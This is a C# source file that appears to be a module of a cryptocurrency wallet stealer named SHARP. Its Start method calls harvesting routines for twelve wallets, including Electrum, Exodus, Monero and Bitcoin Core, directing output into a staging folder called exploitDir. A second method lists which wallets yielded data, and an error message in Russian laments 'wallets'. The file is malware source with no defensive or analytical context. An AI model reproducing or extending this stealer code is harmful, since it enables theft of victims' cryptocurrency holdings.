using System; using System.Threading.Tasks; namespace SHARP { internal class StartWallets { public static async Task Start() { string exploitDir = Help.ExploitDir; try { Armory.ArmoryStr(exploitDir); AtomicWallet.AtomicStr(exploitDir); BitcoinCore.BCStr(exploitDir); Bytecoin.BCNcoinStr(exploitDir); DashCore.DSHcoinStr(exploitDir); Electrum.EleStr(exploitDir); Ethereum.EcoinStr(exploitDir); LitecoinCore.LitecStr(exploitDir); Monero.XMRcoinStr(exploitDir); Exodus.ExodusStr(exploitDir); Zcash.ZecwalletStr(exploitDir); Jaxx.JaxxStr(exploitDir); } catch (Exception ex) { Console.WriteLine(ex?.ToString() + "кошельки :("); } } public static string getAllWallets() { string str = ""; if (Counting.armory > 0) str += "Armory ,"; if (Counting.atomicwallet > 0) str += "AtomicWallet ,"; if (Counting.bitcoincore > 0) str += "BitcoinCore ,"; if (Counting.bytecoin > 0) str += "Bytecoin ,"; if (Counting.dashcore > 0) str += "DashCore ,"; if (Counting.electrum > 0) str += "Electrum ,"; if (Counting.etherium > 0) str += "Etherium ,"; if (Counting.exodus > 0) str += "Exodus ,"; if (Counting.jaxx > 0) str += "Jaxx ,"; if (Counting.litecoincore > 0) str += "LitecoinCore ,"; if (Counting.metamask > 0) str += "Metamask ,"; if (Counting.monero > 0) str += "Monero ,"; if (Counting.zcash > 0) str += "Zcash ,"; return str.Substring(0, str.Length - 2); } } }